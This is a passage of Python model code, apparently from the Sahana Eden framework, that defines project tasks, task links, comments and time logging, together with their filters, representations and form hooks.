IS_ONE_OF(db, "project_milestone.id",
represent)),
represent = represent,
comment = S3AddResourceLink(c="project",
f="milestone",
title=ADD_MILESTONE,
tooltip=T("A project milestone marks a significant date in the calendar which shows that progress towards the overall objective is being made.")),
label = T("Milestone"),
ondelete = "RESTRICT")
configure(tablename,
orderby=table.date,
)
# ---------------------------------------------------------------------
# Tasks
#
# Tasks can be linked to Activities or directly to Projects
# - they can also be used by the Event/Scenario modules
#
# @ToDo: Task templates
# @ToDo: Recurring tasks
#
# These Statuses can be customised, although doing so limits the ability to do synchronization
# - best bet is simply to comment statuses that you don't wish to use
#
project_task_status_opts = {
1: T("Draft"),
2: T("New"),
3: T("Assigned"),
4: T("Feedback"),
5: T("Blocked"),
6: T("On Hold"),
7: T("Canceled"),
8: T("Duplicate"),
9: T("Ready"),
10: T("Verified"),
11: T("Reopened"),
12: T("Completed"),
#99: T("unspecified")
}
project_task_active_statuses = [2, 3, 4, 11]
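# i.e. New, Assigned, Feedback and Reopened: the statuses in which a
# task still needs attention (reading of the status map above)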
project_task_priority_opts = {
1:T("Urgent"),
2:T("High"),
3:T("Normal"),
4:T("Low")
}
#staff = auth.s3_has_role("STAFF")
staff = True
settings = current.deployment_settings
tablename = "project_task"
table = define_table(tablename,
super_link("doc_id", "doc_entity"),
Field("template", "boolean",
default=False,
readable=False,
writable=False),
Field("name",
label = T("Short Description"),
length=100,
notnull=True,
requires = IS_LENGTH(maxsize=100, minsize=1)),
Field("description", "text",
label = T("Detailed Description/URL"),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Detailed Description/URL"),
T("Please provide as much detail as you can, including the URL(s) where the bug occurs or you'd like the new feature to go.")))),
self.org_site_id,
self.gis_location_id(
label=T("Deployment Location"),
readable=False,
writable=False
),
Field("source",
label = T("Source")),
Field("priority", "integer",
requires = IS_IN_SET(project_task_priority_opts,
zero=None),
default = 3,
label = T("Priority"),
represent = lambda opt: \
project_task_priority_opts.get(opt,
UNKNOWN_OPT)),
# Could be a Person, Team or Organisation
super_link("pe_id", "pr_pentity",
readable = staff,
writable = staff,
label = T("Assigned to"),
filterby = "instance_type",
filter_opts = ["pr_person", "pr_group", "org_organisation"],
represent = self.project_assignee_represent,
# @ToDo: Widget
#widget = S3PentityWidget(),
#comment = DIV(_class="tooltip",
# _title="%s|%s" % (T("Assigned to"),
# T("Enter some characters to bring up a list of possible matches")))
),
s3_datetime("date_due",
label = T("Date Due"),
past=0,
future=8760, # Hours, so 1 year
represent="date",
readable = staff,
writable = staff,
),
Field("time_estimated", "double",
readable = staff,
writable = staff,
represent = lambda v: v or "",
label = "%s (%s)" % (T("Time Estimate"),
T("hours"))),
Field("time_actual", "double",
readable = staff,
# This comes from the Time component
writable=False,
label = "%s (%s)" % (T("Time Taken"),
T("hours"))),
Field("status", "integer",
requires = IS_IN_SET(project_task_status_opts,
zero=None),
default = 2,
readable = staff,
writable = staff,
label = T("Status"),
represent = lambda opt: \
project_task_status_opts.get(opt,
UNKNOWN_OPT)),
*s3_meta_fields())
# Virtual field
table.task_id = Field.Lazy(self.project_task_task_id)
# Field configurations
# Comment these if you don't need a Site associated with Tasks
#table.site_id.readable = table.site_id.writable = True
#table.site_id.label = T("Check-in at Facility") # T("Managing Office")
table.created_on.represent = lambda dt: \
S3DateTime.date_represent(dt, utc=True)
# CRUD Strings
ADD_TASK = T("Add Task")
crud_strings[tablename] = Storage(
title_create = ADD_TASK,
title_display = T("Task Details"),
title_list = T("Tasks"),
title_update = T("Edit Task"),
title_search = T("Search Tasks"),
title_upload = T("Import Tasks"),
subtitle_create = T("Add New Task"),
label_list_button = T("List Tasks"),
label_create_button = ADD_TASK,
msg_record_created = T("Task added"),
msg_record_modified = T("Task updated"),
msg_record_deleted = T("Task deleted"),
msg_list_empty = T("No tasks currently registered"))
# Search Method
filter_widgets = [
S3TextFilter(["name",
"description",
],
label=T("Description"),
_class="filter-search",
),
S3OptionsFilter("priority",
label=T("Priority"),
#represent="%(name)s",
#widget="multiselect",
options=project_task_priority_opts,
cols=4,
),
S3OptionsFilter("task_project.project_id",
label=T("Project"),
options = self.project_task_project_opts,
#represent="%(name)s",
#widget="multiselect",
cols=3,
),
S3OptionsFilter("task_activity.activity_id",
label=T("Activity"),
options = self.project_task_activity_opts,
#represent="%(name)s",
#widget="multiselect",
cols=3,
),
S3OptionsFilter("pe_id",
label=T("Assigned To"),
# @ToDo: Implement support for this in S3OptionsFilter
#null = T("Unassigned"),
#represent="%(name)s",
#widget="multiselect",
cols=4,
),
S3OptionsFilter("created_by",
label=T("Created By"),
#widget="multiselect",
cols=3,
hidden=True,
),
S3RangeFilter("created_on",
label=T("Date Created"),
hide_time=True,
hidden=True,
),
S3RangeFilter("date_due",
label=T("Date Due"),
hide_time=True,
hidden=True,
),
S3RangeFilter("modified_on",
label=T("Date Modified"),
hide_time=True,
hidden=True,
),
S3OptionsFilter("status",
label=T("Status"),
options=project_task_status_opts,
#represent="%(name)s",
#widget="multiselect",
cols=4,
),
]
list_fields=["id",
(T("ID"), "task_id"),
"priority",
"name",
"pe_id",
"date_due",
"time_estimated",
"time_actual",
"created_on",
"status",
#"site_id"
]
if settings.get_project_milestones():
# Use the field in this format to get the custom represent
list_fields.insert(5, (T("Milestone"), "task_milestone.milestone_id"))
filter_widgets.insert(4, S3OptionsFilter("task_milestone.milestone_id",
label = T("Milestone"),
options = self.project_task_milestone_opts,
cols = 3
))
report_options = Storage(rows = list_fields,
cols = list_fields,
fact = list_fields,
defaults = Storage(rows = "task.project",
cols = "task.pe_id",
fact = "sum(task.time_estimated)",
totals = True
),
)
# Custom Form
crud_form = S3SQLCustomForm(
"name",
"description",
"source",
"priority",
"pe_id",
"date_due",
"time_estimated",
"status",
S3SQLInlineComponent(
"time",
label = T("Time Log"),
fields = ["date",
"person_id",
"hours",
"comments"
],
orderby = "date"
),
"time_actual",
)
# Resource Configuration
configure(tablename,
super_entity = "doc_entity",
copyable = True,
orderby = "project_task.priority,project_task.date_due asc",
realm_entity = self.project_task_realm_entity,
onvalidation = self.project_task_onvalidation,
#create_next = URL(f="task", args=["[id]"]),
create_onaccept = self.project_task_create_onaccept,
update_onaccept = self.project_task_update_onaccept,
filter_widgets = filter_widgets,
report_options = report_options,
list_fields = list_fields,
extra_fields = ["id"],
crud_form = crud_form,
extra = "description"
)
# Reusable field
task_id = S3ReusableField("task_id", table,
label = T("Task"),
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_task.id",
self.project_task_represent)),
represent = self.project_task_represent,
comment = S3AddResourceLink(c="project",
f="task",
title=ADD_TASK,
tooltip=T("A task is a piece of work that an individual or team can do in 1-2 days.")),
ondelete = "CASCADE")
# Custom Methods
set_method("project", "task",
method="dispatch",
action=self.project_task_dispatch)
# Components
# Projects (for imports)
add_component("project_project",
project_task=dict(link="project_task_project",
joinby="task_id",
key="project_id",
actuate="embed",
autocomplete="name",
autodelete=False))
# Activities
add_component("project_activity",
project_task=dict(link="project_task_activity",
joinby="task_id",
key="activity_id",
actuate="embed",
autocomplete="name",
autodelete=False))
# Milestones
add_component("project_milestone",
project_task=dict(link="project_task_milestone",
joinby="task_id",
key="milestone_id",
actuate="embed",
autocomplete="name",
autodelete=False))
# Job titles
add_component("hrm_job_title",
project_task=dict(link="project_task_job_title",
joinby="task_id",
key="job_title_id",
actuate="embed",
autocomplete="name",
autodelete=False))
# Human Resources (assigned)
add_component("hrm_human_resource",
project_task=dict(link="project_task_human_resource",
joinby="task_id",
key="human_resource_id",
actuate="embed",
autocomplete="name",
autodelete=False))
# Requests
add_component("req_req",
project_task=dict(link="project_task_req",
joinby="task_id",
key="req_id",
actuate="embed",
autocomplete="request_number",
autodelete=False))
# Time
add_component("project_time", project_task="task_id")
# Comments (for imports))
add_component("project_comment", project_task="task_id")
# ---------------------------------------------------------------------
# Link Tasks <-> Projects
#
tablename = "project_task_project"
table = define_table(tablename,
task_id(),
project_id(
# Override requires so that update access to the projects isn't required
requires = IS_ONE_OF(db, "project_project.id",
self.project_project_represent
)
),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Link task <-> activity
#
# Tasks <> Activities
tablename = "project_task_activity"
table = define_table(tablename,
task_id(),
self.project_activity_id(),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Link task <-> milestone
#
# Tasks <> Milestones
tablename = "project_task_milestone"
table = define_table(tablename,
task_id(),
milestone_id(),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Project comment
#
# @ToDo: Attachments?
#
# Parent field allows us to:
# * easily filter for top-level threads
# * easily filter for next level of threading
# * hook a new reply into the correct location in the hierarchy
#
tablename = "project_comment"
table = define_table(tablename,
Field("parent", "reference project_comment",
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "project_comment.id"
)),
readable=False),
task_id(),
Field("body", "text",
notnull=True,
label = T("Comment")),
*s3_meta_fields())
# Resource Configuration
configure(tablename,
list_fields=["id",
"task_id",
"created_by",
"modified_on"
])
# ---------------------------------------------------------------------
# Project Time
# - used to Log hours spent on a Task
#
tablename = "project_time"
table = define_table(tablename,
task_id(
requires = IS_ONE_OF(db, "project_task.id",
self.project_task_represent_w_project,
),
),
self.pr_person_id(default=auth.s3_logged_in_person(),
widget = SQLFORM.widgets.options.widget
),
s3_datetime(default="now",
past=8760, # Hours, so 1 year
future=0
),
Field("hours", "double",
label = "%s (%s)" % (T("Time"),
T("hours")),
represent=lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2)),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_TIME = T("Log Time Spent")
crud_strings[tablename] = Storage(
title_create = ADD_TIME,
title_display = T("Logged Time Details"),
title_list = T("Logged Time"),
title_update = T("Edit Logged Time"),
title_search = T("Search Logged Time"),
title_upload = T("Import Logged Time data"),
title_report = T("Project Time Report"),
subtitle_create = T("Log New Time"),
label_list_button = T("List Logged Time"),
label_create_button = ADD_TIME,
msg_record_created = T("Time Logged"),
msg_record_modified = T("Time Log Updated"),
msg_record_deleted = T("Time Log Deleted"),
msg_list_empty = T("No Time Logged")
)
if "rows" in request.get_vars and request.get_vars.rows == "project":
crud_strings[tablename].title_report = T("Project Time Report")
list_fields = ["id",
(T("Project"), "task_id$task_project.project_id"),
(T("Activity"), "task_id$task_activity.activity_id"),
"task_id",
"person_id",
"date",
"hours",
"comments",
]
# Virtual Fields
table.day = Field.Lazy(project_time_day)
table.week = Field.Lazy(project_time_week)
filter_widgets = [
S3OptionsFilter("person_id",
label=T("Person"),
#represent="%(name)s",
#widget="multiselect",
cols=3,
),
S3OptionsFilter("task_id$task_project.project_id",
label=T("Project"),
options = self.project_task_project_opts,
#represent="%(name)s",
#widget="multiselect",
cols=3,
),
S3OptionsFilter("task_id$task_activity.activity_id",
label=T("Activity"),
options = self.project_task_activity_opts,
#represent="%(name)s",
#widget="multiselect",
cols=3,
hidden=True,
),
S3DateFilter("date",
label=T("Date"),
hide_time=True,
hidden=True,
),
]
if settings.get_project_milestones():
# Use the field in this format to get the custom represent
list_fields.insert(3, (T("Milestone"), "task_id$task_milestone.milestone_id"))
filter_widgets.insert(3, S3OptionsFilter("task_id$task_milestone.milestone_id",
label = T("Milestone"),
cols = 3,
hidden = True,
))
report_fields = list_fields + \
[(T("Day"), "day"),
(T("Week"), "week")]
if settings.get_project_sectors():
report_fields.insert(3, (T("Sector"),
"task_id$task_project.project_id$sector_project.sector_id"))
def get_sector_opts():
stable = self.org_sector
rows = db(stable.deleted == False).select(stable.id, stable.name)
sector_opts = {}
for row in rows:
sector_opts[row.id] = row.name
return sector_opts
filter_widgets.insert(1, S3OptionsFilter("task_id$task_project.project_id$sector_project.sector_id",
label = T("Sector"),
options = get_sector_opts,
cols = 3,
))
# Custom Methods
set_method("project", "time",
method="effort",
action=self.project_time_effort_report)
configure(tablename,
onaccept=self.project_time_onaccept,
filter_widgets=filter_widgets,
report_fields=["date"],
report_options=Storage(
rows=report_fields,
cols=report_fields,
fact=report_fields,
defaults=Storage(
rows="task_id$task_project.project_id",
cols="person_id",
fact="sum(hours)",
totals=True
),
),
list_fields=list_fields
)
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(
project_task_id = task_id,
project_task_active_statuses = project_task_active_statuses,
project_task_represent_w_project = self.project_task_represent_w_project,
)
# -------------------------------------------------------------------------
def defaults(self):
""" Safe defaults for model-global names if module is disabled """
dummy = S3ReusableField("dummy_id", "integer",
readable=False,
writable=False)
return dict(project_task_id = lambda **attr: dummy("task_id"),
project_task_active_statuses = [],
)
# -------------------------------------------------------------------------
@staticmethod
def project_task_task_id(row):
""" The record ID of a task as separate column in the data table """
if hasattr(row, "project_task"):
row = row.project_task
try:
return row.id
except AttributeError:
return None
# -------------------------------------------------------------------------
@staticmethod
def project_task_project_opts():
"""
Provide the options for the Project search filter
- all Projects with Tasks
"""
db = current.db
ptable = db.project_project
ttable = db.project_task
ltable = db.project_task_project
query = (ttable.deleted != True) & \
(ltable.task_id == ttable.id) & \
(ltable.project_id == ptable.id)
rows = db(query).select(ptable.id, ptable.name)
return dict([(row.id, row.name) for row in rows])
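# Returns e.g. {4: "Flood Response", 9: "Shelter Rebuild"} (hypothetical
# IDs/names), suitable as S3OptionsFilter options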
# -------------------------------------------------------------------------
@staticmethod
def project_task_activity_opts():
"""
Provide the options for the Activity search filter
- all Activities with Tasks
"""
db = current.db
atable = db.project_activity
ttable = db.project_task
ltable = db.project_task_activity
query = (ttable.deleted == False) & \
(ltable.task_id == ttable.id) & \
(ltable.activity_id == atable.id)
opts = db(query).select(atable.name)
_dict = {}
for opt in opts:
_dict[opt.name] = opt.name
return _dict
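# Note: unlike the project options above, this dict is keyed by name
# (name -> name) rather than by record ID, so the filter matches on the
# represented value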
# -------------------------------------------------------------------------
@staticmethod
def project_task_milestone_opts():
"""
Provide the options for the Milestone search filter
- all Milestones with Tasks
"""
db = current.db
mtable = db.project_milestone
ttable = db.project_task
ltable = db.project_task_milestone
query = (ttable.deleted == False) & \
(ltable.task_id == ttable.id) & \
(ltable.milestone_id == mtable.id)
opts = db(query).select(mtable.name)
_dict = {}
for opt in opts:
_dict[opt.name] = opt.name
return _dict
# -------------------------------------------------------------------------
@staticmethod
def project_assignee_represent(id, row=None):
""" FK representation """
if row:
id = row.pe_id
instance_type = row.instance_type
elif id:
if isinstance(id, Row):
instance_type = id.instance_type
id = id.pe_id
else:
instance_type = None
else:
return current.messages["NONE"]
db = current.db
s3db = current.s3db
if not instance_type:
table = s3db.pr_pentity
r = db(table._id == id).select(table.instance_type,
limitby=(0, 1)).first()
instance_type = r.instance_type
if instance_type == "pr_person":
# @ToDo: optionally show initials instead of the full name
return s3_fullname(pe_id=id) or current.messages.UNKNOWN_OPT
elif instance_type in ("pr_group", "org_organisation"):
# Team or Organisation
table = s3db[instance_type]
r = db(table.pe_id == id).select(table.name,
limitby=(0, 1)).first()
try:
return r.name
except:
return current.messages.UNKNOWN_OPT
else:
return current.messages.UNKNOWN_OPT
# ---------------------------------------------------------------------
@staticmethod
def project_task_represent(id, row=None, show_link=True,
show_project=False):
""" FK representation """
if row:
represent = row.name
if show_project:
db = current.db
ltable = db.project_task_project
ptable = db.project_project
query = (ltable.task_id == row.id) & \
(ltable.project_id == ptable.id)
project = db(query).select(ptable.name,
limitby=(0, 1)).first()
if project:
represent = "%s (%s)" % (represent, project.name)
if show_link:
return A(represent,
_href=URL(c="project", f="task", extension="html",
args=[row.id]))
return represent
elif not id:
return current.messages["NONE"]
db = current.db
table = db.project_task
r = db(table.id == id).select(table.name,
limitby=(0, 1)).first()
try:
represent = r.name
except:
return current.messages.UNKNOWN_OPT
else:
if show_project:
ltable = db.project_task_project
ptable = db.project_project
query = (ltable.task_id == id) & \
(ltable.project_id == ptable.id)
project = db(query).select(ptable.name,
limitby=(0, 1)).first()
if project:
represent = "%s (%s)" % (represent, project.name)
if show_link:
return A(represent,
_href=URL(c="project", f="task", extension="html",
args=[id]))
return represent
# ---------------------------------------------------------------------
@staticmethod
def project_task_represent_w_project(id, row=None):
"""
FK representation including the project name
(the show_project=True variant of the normal represent cannot be
passed as a lambda to IS_ONE_OF, hence this separate method)
"""
if row:
db = current.db
ltable = db.project_task_project
ptable = db.project_project
query = (ltable.task_id == row.id) & \
(ltable.project_id == ptable.id)
project = db(query).select(ptable.name,
limitby=(0, 1)).first()
if project:
represent = "%s: %s" % (project.name, row.name)
else:
represent = "- %s" % row.name
return represent
elif not id:
return current.messages["NONE"]
db = current.db
table = db.project_task
r = db(table.id == id).select(table.name,
limitby=(0, 1)).first()
try:
name = r.name
except:
return current.messages.UNKNOWN_OPT
else:
ltable = db.project_task_project
ptable = db.project_project
query = (ltable.task_id == id) & \
(ltable.project_id == ptable.id)
project = db(query).select(ptable.name,
limitby=(0, 1)).first()
if project:
represent = "%s: %s" % (project.name, name)
else:
represent = "- %s" % name
return represent
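# Illustrative output (assumed data): a task "Fix pump" linked to
# project "WASH" represents as "WASH: Fix pump"; an unlinked task
# represents as "- Fix pump"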
# -------------------------------------------------------------------------
@staticmethod
def project_task_realm_entity(table, record):
""" Set the task realm entity to the project's realm entity """
task_id = record.id
db = current.db
ptable = db.project_project
ltable = db.project_task_project
query = (ltable.task_id == task_id) & \
(ltable.project_id == ptable.id)
project = db(query).select(ptable.realm_entity,
limitby=(0, 1)).first()
if project:
return project.realm_entity
else:
return None
# -------------------------------------------------------------------------
@staticmethod
def project_task_onvalidation(form):
""" Task form validation """
vars = form.vars
if str(vars.status) == "3" and not vars.pe_id:
form.errors.pe_id = \
current.T("Status 'assigned' requires the %(fieldname)s to not be blank") % \
dict(fieldname=current.db.project_task.pe_id.label)
elif vars.pe_id and str(vars.status) == "2":
# Set the Status to 'Assigned' if left at default 'New'
vars.status = 3
return
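# Illustrative behaviour of the rule above: submitting status=3
# (Assigned) with an empty "Assigned to" raises a form error, while
# submitting status=2 (New) with an assignee promotes the status to 3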
# -------------------------------------------------------------------------
@staticmethod
def project_task_create_onaccept(form):
"""
When a Task is created:
* Process the additional fields: Project/Activity/Milestone
* create associated Link Table records
* notify assignee
"""
db = current.db
s3db = current.s3db
session = current.session
id = form.vars.id
if session.s3.event:
# Create a link between this Task & the active Event
etable = s3db.event_task
etable.insert(event_id=session.s3.event,
task_id=id)
ltp = db.project_task_project
vars = current.request.post_vars
project_id = vars.get("project_id", None)
if project_id:
# Create Link to Project
link_id = ltp.insert(task_id = id,
project_id = project_id)
activity_id = vars.get("activity_id", None)
if activity_id:
# Create Link to Activity
lta = db.project_task_activity
link_id = lta.insert(task_id = id,
activity_id = activity_id)
milestone_id = vars.get("milestone_id", None)
if milestone_id:
# Create Link to Milestone
ltable = db.project_task_milestone
link_id = ltable.insert(task_id = id,
milestone_id = milestone_id)
# Make sure the task is also linked to the project
# when created under an activity
row = db(ltp.task_id == id).select(ltp.project_id,
limitby=(0, 1)).first()
if not row:
lta = db.project_task_activity
ta = db.project_activity
query = (lta.task_id == id) & \
(lta.activity_id == ta.id)
row = db(query).select(ta.project_id,
limitby=(0, 1)).first()
if row and row.project_id:
ltp.insert(task_id=id,
project_id=row.project_id)
# Notify Assignee
task_notify(form)
return
# -------------------------------------------------------------------------
@staticmethod
def project_task_update_onaccept(form):
"""
* Process the additional fields: Project/Activity/Milestone
* Log changes as comments
* If the task is assigned to someone then notify them
"""
db = current.db
s3db = current.s3db
vars = form.vars
id = vars.id
record = form.record
table = db.project_task
changed = {}
if record: # Not True for a record merger
for var in vars:
vvar = vars[var]
rvar = record[var]
if vvar != rvar:
ftype = table[var].type
if ftype == "integer" or \
ftype.startswith("reference"):
if vvar:
vvar = int(vvar)
if vvar == rvar:
continue
represent = table[var].represent
if not represent:
represent = lambda o: o
if rvar:
changed[var] = "%s changed from %s to %s" % \
(table[var].label, represent(rvar), represent(vvar))
else:
changed[var] = "%s changed to %s" % \
(table[var].label, represent(vvar))
if changed:
table = db.project_comment
text = s3_auth_user_represent(current.auth.user.id)
for var in changed:
text = "%s\n%s" % (text, changed[var])
table.insert(task_id=id,
body=text)
vars = current.request.post_vars
if "project_id" in vars:
ltable = db.project_task_project
filter = (ltable.task_id == id)
project = vars.project_id
if project:
# Create the link to the Project
#ptable = db.project_project
#master = s3db.resource("project_task", id=id)
#record = db(ptable.id == project).select(ptable.id,
# limitby=(0, 1)).first()
#link = s3db.resource("project_task_project")
#link_id = link.update_link(master, record)
query = (ltable.task_id == id) & \
(ltable.project_id == project)
record = db(query).select(ltable.id, limitby=(0, 1)).first()
if record:
link_id = record.id
else:
link_id = ltable.insert(task_id = id,
project_id = project)
filter = filter & (ltable.id != link_id)
# Remove any other links
links = s3db.resource("project_task_project", filter=filter)
ondelete = s3db.get_config("project_task_project", "ondelete")
links.delete(ondelete=ondelete)
if "activity_id" in vars:
ltable = db.project_task_activity
filter = (ltable.task_id == id)
activity = vars.activity_id
if vars.activity_id:
# Create the link to the Activity
#atable = db.project_activity
#master = s3db.resource("project_task", id=id)
#record = db(atable.id == activity).select(atable.id,
# limitby=(0, 1)).first()
#link = s3db.resource("project_task_activity")
#link_id = link.update_link(master, record)
query = (ltable.task_id == id) & \
(ltable.activity_id == activity)
record = db(query).select(ltable.id, limitby=(0, 1)).first()
if record:
link_id = record.id
else:
link_id = ltable.insert(task_id = id,
activity_id = activity)
filter = filter & (ltable.id != link_id)
# Remove any other links
links = s3db.resource("project_task_activity", filter=filter)
ondelete = s3db.get_config("project_task_activity", "ondelete")
links.delete(ondelete=ondelete)
if "milestone_id" in vars:
ltable = db.project_task_milestone
filter = (ltable.task_id == id)
milestone = vars.milestone_id
if milestone:
# Create the link to the Milestone
#mtable = db.project_milestone
#master = s3db.resource("project_task", id=id)
#record = db(mtable.id == milestone).select(mtable.id,
# limitby=(0, 1)).first()
#link = s3db.resource("project_task_milestone")
#link_id = link.update_link(master, record)
query = (ltable.task_id == id) & \
(ltable.milestone_id == milestone)
record = db(query).select(ltable.id, limitby=(0, 1)).first()
if record:
link_id = record.id
else:
link_id = ltable.insert(task_id = id,
milestone_id = milestone)
filter = filter & (ltable.id != link_id)
# Remove any other links
links = s3db.resource("project_task_milestone", filter=filter)
ondelete = s3db.get_config("project_task_milestone", "ondelete")
links.delete(ondelete=ondelete)
# Notify Assignee
task_notify(form)
return
# -------------------------------------------------------------------------
@staticmethod
def project_task_dispatch(r, **attr):
"""
Send a Task Dispatch notice from a Task
- if a location is supplied, this will be formatted as an OpenGeoSMS
"""
if r.representation == "html" and \
r.name == "task" and r.id and not r.component:
record = r.record
text = "%s: %s" % (record.name,
record.description)
# Encode the message as an OpenGeoSMS
msg = current.msg
message = msg.prepare_opengeosms(record.location_id,
code="ST",
map="google",
text=text)
# URL to redirect to after message sent
url = URL(c="project",
f="task",
args=r.id)
# Create the form
if record.pe_id:
opts = dict(recipient=record.pe_id)
else:
opts = dict(recipient_type="pr_person")
output = msg.compose(type="SMS",
message = message,
url = url,
**opts)
# Maintain RHeader for consistency
if "rheader" in attr:
rheader = attr["rheader"](r)
if rheader:
output["rheader"] = rheader
output["title"] = current.T("Send Task Notification")
current.response.view = "msg/compose.html"
return output
else:
raise HTTP(501, current.messages.BADMETHOD)
# -------------------------------------------------------------------------
@staticmethod
def project_milestone_duplicate(item):
""" Import item de-duplication """
if item.tablename == "project_milestone":
data = item.data
table = item.table
# Duplicate if same Name & Project
if "name" in data and data.name:
query = (table.name.lower() == data.name.lower())
else:
# Nothing we can work with
return
if "project_id" in data and data.project_id:
query &= (table.project_id == data.project_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# -------------------------------------------------------------------------
@staticmethod
def project_time_onaccept(form):
""" When Time is logged, update the Task & Activity """
db = current.db
titable = db.project_time
ttable = db.project_task
atable = db.project_activity
tatable = db.project_task_activity
# Find the Task
task_id = form.vars.task_id
if not task_id:
# Component Form
query = (titable.id == form.vars.id)
record = db(query).select(titable.task_id,
limitby=(0, 1)).first()
if record:
task_id = record.task_id
# Total the Hours Logged
query = (titable.deleted == False) & \
(titable.task_id == task_id)
rows = db(query).select(titable.hours)
hours = 0
for row in rows:
if row.hours:
hours += row.hours
# Update the Task
query = (ttable.id == task_id)
db(query).update(time_actual=hours)
# Find the Activity
query = (tatable.deleted == False) & \
(tatable.task_id == task_id)
activity = db(query).select(tatable.activity_id,
limitby=(0, 1)).first()
if activity:
activity_id = activity.activity_id
# Find all Tasks in this Activity
query = (ttable.deleted == False) & \
(tatable.deleted == False) & \
(tatable.task_id == ttable.id) & \
(tatable.activity_id == activity_id)
tasks = db(query).select(ttable.time_actual)
# Total the Hours Logged
hours = 0
for task in tasks:
hours += task.time_actual or 0 # Handle None
# Update the Activity
query = (atable.id == activity_id)
db(query).update(time_actual=hours)
return
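# Illustrative rollup (assumed data): logging 2.5h and 1.5h against a
# task sets task.time_actual = 4.0; if that task's activity has another
# task with 3.0h logged, activity.time_actual becomes 7.0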
# -------------------------------------------------------------------------
@staticmethod
def project_time_effort_report(r, **attr):
"""
Provide a Report on Effort by week
@ToDo: https://sahana.mybalsamiq.com/projects/sandbox/Effort
"""
if r.representation == "html":
T = current.T
request = current.request
resource = r.resource
output = {}
from s3.s3data import S3PivotTable
rows = "person_id"
cols = "week"
layers = [("hours", "sum")]
pivot = S3PivotTable(resource, rows, cols, layers)
_table = pivot.html()
output["items"] = _table
output["title"] = T("Effort Report")
current.response.view = "list.html"
return output
else:
raise HTTP(501, current.messages.BADMETHOD)
# =============================================================================
class S3ProjectTaskHRMModel(S3Model):
"""
Project Task HRM Model
This class holds the tables used to link Tasks to Human Resources
- either individuals or Job Roles
"""
names = ["project_task_job_title",
"project_task_human_resource",
]
def model(self):
define_table = self.define_table
task_id = self.project_task_id
# ---------------------------------------------------------------------
# Link Tasks <> Human Resources
tablename = "project_task_human_resource"
table = define_table(tablename,
task_id(),
self.hrm_human_resource_id(),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Link Tasks <> Job Roles
tablename = "project_task_job_title"
table = define_table(tablename,
task_id(),
self.hrm_job_title_id(),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(
)
# =============================================================================
class S3ProjectTaskIReportModel(S3Model):
"""
Project Task IReport Model
This class holds the table used to link Tasks with Incident Reports.
@ToDo: Link to Incidents instead?
"""
names = ["project_task_ireport",
]
def model(self):
# Link Tasks <-> Incident Reports
#
tablename = "project_task_ireport"
table = self.define_table(tablename,
self.project_task_id(),
self.irs_ireport_id(),
*s3_meta_fields())
self.configure(tablename,
onaccept=self.task_ireport_onaccept)
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(
)
# -------------------------------------------------------------------------
@staticmethod
def task_ireport_onaccept(form):
"""
When a Task is linked to an IReport, then populate the location_id
"""
vars = form.vars
ireport_id = vars.ireport_id
task_id = vars.task_id
db = current.db
# Check if we already have a Location for the Task
table = db.project_task
query = (table.id == task_id)
record = db(query).select(table.location_id,
limitby=(0, 1)).first()
if not record or record.location_id:
return
# Find the Incident Location
itable = db.irs_ireport
query = (itable.id == ireport_id)
record = db(query).select(itable.location_id,
limitby=(0, 1)).first()
if not record or not record.location_id:
return
location_id = record.location_id
# Update the Task
query = (table.id == task_id)
db(query).update(location_id=location_id)
return
# =============================================================================
def multi_theme_percentage_represent(id):
"""
Representation for Theme Percentages
for multiple=True options
"""
if not id:
return current.messages["NONE"]
s3db = current.s3db
table = s3db.project_theme_percentage
ttable = s3db.project_theme
def represent_row(row):
return "%s (%s%s)" % (row.project_theme.name,
row.project_theme_percentage.percentage,
"%")
if isinstance(id, (list, tuple)):
query = (table.id.belongs(id)) & \
(ttable.id == table.theme_id)
rows = current.db(query).select(table.percentage,
ttable.name)
repr = ", ".join(represent_row(row) for row in rows)
return repr
else:
query = (table.id == id) & \
(ttable.id == table.theme_id)
row = current.db(query).select(table.percentage,
ttable.name).first()
try:
return represent_row(row)
except:
return current.messages.UNKNOWN_OPT
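# Illustrative sketch of the output built above (IDs and theme names are
# invented for this example, not taken from any real database):
#
#   multi_theme_percentage_represent([3, 7])
#   -> "Health (60%), Education (40%)"
#
# i.e. each matching project_theme_percentage row is rendered as
# "<theme name> (<percentage>%)" and the results are comma-joined.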
# =============================================================================
class project_LocationRepresent(S3Represent):
""" Representation of Project Locations """
def __init__(self,
translate=False,
show_link=False,
multiple=False,
):
settings = current.deployment_settings
if settings.get_project_community():
# Community is the primary resource
self.community = True
else:
# Location is just a way to display Projects on a map
self.community = False
if settings.get_gis_countries() == 1:
self.multi_country = False
else:
self.multi_country = True
self.use_codes = settings.get_project_codes()
self.lookup_rows = self.custom_lookup_rows
super(project_LocationRepresent,
self).__init__(lookup="project_location",
show_link=show_link,
translate=translate,
multiple=multiple)
# -------------------------------------------------------------------------
def custom_lookup_rows(self, key, values, fields=None):
"""
            Custom lookup method for project_location rows, does a
            join with the projects and locations. Parameters
            key and fields are not used, but are kept for API
            compatibility reasons.
@param values: the project_location IDs
"""
db = current.db
ltable = current.s3db.project_location
gtable = db.gis_location
fields = [ltable.id, # pkey is needed for the cache
gtable.name,
gtable.level,
gtable.L0,
gtable.L1,
gtable.L2,
gtable.L3,
gtable.L4,
gtable.L5,
]
if len(values) == 1:
query = (ltable.id == values[0]) & \
(ltable.location_id == gtable.id)
limitby = (0, 1)
else:
query = (ltable.id.belongs(values)) & \
(ltable.location_id == gtable.id)
limitby = None
if not self.community:
ptable = db.project_project
query &= (ltable.project_id == ptable.id)
fields.append(ptable.name)
if self.use_codes:
fields.append(ptable.code)
rows = db(query).select(*fields,
limitby=limitby)
self.queries += 1
return rows
# -------------------------------------------------------------------------
def represent_row(self, row):
"""
Represent a single Row
@param row: the joined Row
"""
community = self.community
if not self.community:
